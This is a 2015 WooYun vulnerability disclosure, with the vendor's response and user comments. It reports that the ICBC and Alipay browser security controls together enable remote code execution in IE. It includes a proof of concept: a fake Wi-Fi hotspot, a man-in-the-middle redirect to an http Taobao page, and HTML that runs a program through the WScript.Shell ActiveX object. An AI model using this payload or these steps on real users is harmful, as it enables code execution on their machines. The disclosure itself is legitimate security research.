漏洞概要
关注数(24 )
关注此漏洞
漏洞标题:工商银行安全控件可导致远程任意代码执行(新型技术点)
提交时间:2015-02-09 12:38
修复时间:2015-05-10 14:03
公开时间:2015-05-10 14:03
漏洞类型:远程代码执行
危害等级:高
自评Rank:18
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情 披露状态:
2015-02-09: 细节已通知厂商并且等待厂商处理中 2015-02-09: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2015-04-05: 细节向核心白帽子及相关领域专家公开 2015-04-15: 细节向普通白帽子公开 2015-04-25: 细节向实习白帽子公开 2015-05-10: 细节向公众公开
简要描述: 某网上银行安全控件可导致远程任意代码执行。
详细说明: 其实这个漏洞涉及两个厂商的安全控件:中国工商银行网银助手(版本:1.5.3.0)[1]和支付宝安全控件(版本:5.0.0.3597)[2]。需要用户两个都安装,才好利用。另外需要使用IE浏览器,IE版本不限。 我用的是英文版Windows 7的虚拟机测试的,我不太清楚一些设置的中文怎么说,所以大家只能将就看英文了。 一般情况下,IE的Trusted sites域的默认Security level是“中等”。这个设置是不允许执行高危的ActiveX代码的。安装ActiveX控件也会有提示。所以是安全的。
而我发现当安装完中国工商银行的网银助手之后,发现Trusted sites域的Security level变成了“自定义”,并把https://*.icbc.com.cn加入到了Trusted sites域中。特别是安全设置中的“Initialize and script ActiveX controls not marked as safe for scripting”由默认的禁止变成了启用。
这一更改是此漏洞的核心。一旦启用了这一选项,域内的任何网页都可以无需用户许可即能执行高危的ActiveX代码,比如打开任意程序、读写本地文件。微软3年前对此有过详细解释[3]。我不知道是不是工行对自己的网站特别信任,以为https://*.icbc.com.cn/是可信安全的,不会被利用,所以给高权限“没事”。 但是别忘了,IE不是你们工行客户端软件,用户和其他“安全”控件都可能将一些网站加入Trusted sites域。比如,我发现支付宝就干这事。 装完支付宝之后,信任列表里又多了几个阿里巴巴旗下的网站:http://*.alipay.com, http://*.alisoft.com, http://*.taobao.com, https://*.alipay.com等。
这就意味着,如果用户同时使用工行网银和支付宝,那么阿里巴巴的3个网站同时拥有了执行任意代码的权限。由于工行和支付宝的高度相关性,肯定有非常多的共同用户。而如果淘宝网上有个存储型XSS…… 更不幸的是,支付宝添加的网站还有非https的,所以还可以轻易被中间人攻击,用来植入木马。 [1] http://www.icbc.com.cn/ICBC/html/download/EbankToolsSoftware/x64/ICBCSetupIntegration_64.msi [2] https://download.alipay.com/sec/edit/aliedit.exe [3] http://blogs.technet.com/b/fdcc/archive/2011/11/03/enabling-initialize-and-script-activex-controls-not-marked-as-safe-in-any-zone-can-get-you-hurt-bad.aspx
漏洞证明: 本人对XSS实在不熟,本想拿个反射型XSS做演示,但没找到。所以就用中间人攻击演示吧: 0、建个假Wi-Fi热点,吸引人们连接。 1、将任意HTTP页跳转到http://www.taobao.com/, 2、给http://www.taobao.com/直接返回以下代码:
<!DOCTYPE html> <html> <head> <meta charset="utf-8" /> <title>认证</title> <script> try { var shell = new ActiveXObject("WScript.Shell"); shell.Run("calc.exe"); // 执行什么都行 } catch (err) { // 没有安装支付宝和工行助手 } location.href = (location.hash.length > 1) ? location.hash.substr(1) : "http://www.baidu.com"; // 转回原网站 </script> </head> <body> <p>认证中,请稍后……</p> </body> </html>
3、如果这个用户装了支付宝和工行助手,那么代码就已经执行。
修复方案: 二位别修改用户的IE浏览器设置不行吗?即使真的需要,也绝不能给任意域开启Initialize and script ActiveX controls not marked as safe for scripting。也不要添加明文http网站至信任列表。
版权声明:转载请注明来源 MITM @乌云
漏洞回应 厂商回应: 危害等级:无影响厂商忽略
忽略时间:2015-05-10 14:03
厂商回复: 对于控件启用,属于软件功能的使用问题,涉及所述工商银行的,均已标记https的链接为信任目标。对于攻击利用存在较高的前提,暂不作为漏洞风险进行确认。先行公开,供讨论。
漏洞Rank:20 (WooYun评价)
最新状态: 暂无
漏洞评价:
评论
2015-02-09 12:38 |
浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)
2015-02-09 12:42 |
疯子 ( 普通白帽子 | Rank:242 漏洞数:42 | 世人笑我太疯癫,我笑世人看不穿~)
2015-02-09 12:42 |
糖剩七颗 ( 普通白帽子 | Rank:430 漏洞数:61 | 天涯何处无屌丝)
2015-02-09 12:44 |
zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])
2015-02-09 12:47 |
牛肉包子 ( 普通白帽子 | Rank:254 漏洞数:64 )
2015-02-09 12:57 |
Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)
2015-02-09 13:02 |
’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)
2015-02-09 13:02 |
第四维度 ( 实习白帽子 | Rank:58 漏洞数:34 | 谦谦君子,温润如玉)
2015-02-09 13:04 |
scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)
2015-02-09 13:09 |
Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)
2015-02-09 13:15 |
scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)
2015-02-09 13:33 |
luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)
2015-02-09 13:34 |
%230CC ( 路人 | Rank:6 漏洞数:2 | 溜溜)
2015-02-09 13:40 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
2015-02-09 14:11 |
大大灰狼 ( 普通白帽子 | Rank:248 漏洞数:53 | Newbie)
2015-02-09 14:42 |
子非海绵宝宝 ( 核心白帽子 | Rank:1044 漏洞数:106 | 发扬海绵宝宝的精神!你不是海绵宝宝,你怎...)
2015-02-09 14:58 |
Qiudays ( 路人 | Rank:10 漏洞数:9 | 感觉自己萌萌哒)
2015-02-09 15:02 |
’‘Nome ( 实习白帽子 | Rank:55 漏洞数:19 | 在此感谢 @M4sk @mango @裤裆 @泳少 @5up3r...)
2015-02-09 15:09 |
萨瓦迪卡 ( 实习白帽子 | Rank:34 漏洞数:8 | 傻逼的坚持可能有牛逼的结果。)
2015-02-09 15:56 |
qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)
一直想研究这方面,但是CLSID号怎么得到的呢?以前搞过没搞出来--
2015-02-09 16:01 |
MITM ( 普通白帽子 | Rank:167 漏洞数:25 | 先空着)
作为洞主,我对厂商的回复表示反对。我不认为“攻击利用存在较高的前提”,也不认为这仅是“功能的使用问题”。我的报告里解释了https的问题。我也说了这是两个厂商的漏洞共同利用的结果,不只是工行的漏洞。鉴于代码执行的危害性,希望你们能再考虑一下,把这个问题同时报给*两个厂商*。“相关厂商”一栏的“工商银行”是乌云的审核人员添加的,我原来写的是“某网上银行”。我不知道是不是这一点造成的误会,我不想说责任100%在工商银行。当然乌云审核加的相关厂商也是对的,绝大部分责任在ICBC。
2015-02-10 13:04 |
gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)
2015-02-10 14:45 |
浩天 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)
2015-02-10 15:24 |
李旭敏 ( 普通白帽子 | Rank:469 漏洞数:71 | ฏ๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎๎...)
2015-02-10 15:25 |
伟大娃娃 ( 普通白帽子 | Rank:130 漏洞数:10 | 改变世界)
2015-02-10 16:21 |
px1624 ( 普通白帽子 | Rank:1036 漏洞数:175 | px1624)
2015-02-10 17:16 |
肉肉 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)
@px1624 感觉从标题就能感觉出来吧。这个问题应该不小
2015-02-10 21:56 |
Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)
2015-03-21 04:58 |
秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
2015-04-17 09:44 |
catcat520 ( 路人 | Rank:20 漏洞数:4 | 大家好,我是刚学网络 00后,求照顾,谢谢)
厂商先忽略后修复,高危漏洞,厂商你放学别走,我保证不打死你
2015-04-17 10:09 |
MITM ( 普通白帽子 | Rank:167 漏洞数:25 | 先空着)
@catcat520 刚看了下,其实还没有修复。再有不到1个月公开,@cncert国家互联网应急中心,能不能催一下工行快点修复啊?
2015-05-10 14:07 |
f4ckbaidu ( 普通白帽子 | Rank:182 漏洞数:23 | 开发真是日了狗了)
2015-05-10 21:37 |
zzzzy ( 路人 | Rank:10 漏洞数:3 | 熟练各种语言名称的拼写)
2015-05-10 21:58 |
谢统领 ( 路人 | Rank:0 漏洞数:1 | 谢统领)
2015-05-11 18:08 |
屠龙宝刀点击就送 ( 路人 | Rank:4 漏洞数:2 | 简要介绍不能为空)
2015-06-04 17:30 |
血梦 ( 实习白帽子 | Rank:32 漏洞数:11 | www.blackcyber.org)